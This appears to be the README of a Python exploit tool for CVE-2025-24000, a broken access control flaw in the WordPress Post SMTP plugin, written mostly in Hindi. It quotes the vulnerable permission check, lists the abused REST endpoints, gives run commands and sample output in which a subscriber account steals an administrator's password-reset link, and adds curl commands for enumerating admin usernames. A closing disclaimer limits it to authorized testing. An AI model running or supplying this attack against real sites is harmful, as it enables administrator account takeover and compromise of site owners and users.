
Short Python script for exploiting CVE-2025–24000 based on this blog post: https://medium.com/@security_56355/from-subscriber-to-admin-reproducing-cve-2025-24000-in-wordpress-post-smtp-plugin-8105ff85e274
यह स्क्रिप्ट CVE-2025-24000 का शोषण करती है, जो पोस्ट SMTP वर्डप्रेस प्लगइन (संस्करण ≤ 3.2.0) में एक उच्च-गंभीरता वाली टूटी हुई पहुँच नियंत्रण भेद्यता है। यह किसी भी प्रमाणित उपयोगकर्ता को निम्न-विशेषाधिकार खाते (जैसे सब्सक्राइबर) के साथ प्लगइन के REST API ईमेल लॉग तक पहुँचने, एक व्यवस्थापक पासवर्ड रीसेट लिंक चुराने और व्यवस्थापक खाते पर नियंत्रण लेने की अनुमति देता है।
भेद्यता प्लगइन के REST API में एक दोषपूर्ण अनुमति जांच से उत्पन्न होती है:
// Vulnerable code (≤ 3.2.0)
public function get_logs_permission() {
return is_user_logged_in();
}
कोई भी लॉग-इन उपयोगकर्ता, भूमिका की परवाह किए बिना, केवल व्यवस्थापकों के लिए इच्छित एंडपॉइंट तक पहुँच सकता है:
GET /wp-json/psd/v1/get-logsGET /wp-json/psd/v1/get-details?id=<id>&type=show_viewPOST /wp-json/psd/v1/resend-email/wp-admin/ से WP REST nonce प्राप्त करें/wp-admin में लॉग इन करेंrequests लाइब्रेरी (pip install requests)python3 exploit_cve_2025_24000.py \
--url <wordpress_base_url> \
--username <your_subscriber_username> \
--password <your_subscriber_password> \
--email <admin_username_or_email>
| तर्क | विवरण |
|---|
python3 exploit_cve_2025_24000.py \
--url http://samurai.local/samurai/ \
--username attacker \
--password Password1 \
--email shogun
[*] Logging in as attacker...
[+] Logged in successfully as attacker
[*] Fetching WP REST nonce from wp-admin...
[+] Got nonce: a5f398e081
[*] Triggering password reset for: shogun
[+] Password reset triggered.
[*] Fetching email logs...
[+] Got logs response.
[*] Checking 1 email(s) for reset link...
[+] RESET LINK FOUND:
http://samurai.local/samurai/wp-login.php?action=rp&key=XXXXXXXXXXXX&login=shogun
[*] Visit the link above to set a new admin password and take over the site.
curl -s 'http://target.local/wp-json/wp/v2/users' | python3 -m json.tool
curl -s 'http://target.local/?author=1' -I | grep -i location
यह उपकरण केवल अधिकृत पैठ परीक्षण और शैक्षिक उद्देश्यों के लिए है। उन सिस्टमों के विरुद्ध उपयोग न करें जिनका परीक्षण करने की आपके पास स्पष्ट अनुमति नहीं है।
--url | वर्डप्रेस साइट का आधार URL (जैसे http://target.local/wordpress/) |
--username | आपका निम्न-विशेषाधिकार वर्डप्रेस उपयोगकर्ता नाम |
--password | आपका निम्न-विशेषाधिकार वर्डप्रेस पासवर्ड |
--email | रीसेट करने के लिए व्यवस्थापक उपयोगकर्ता नाम या ईमेल |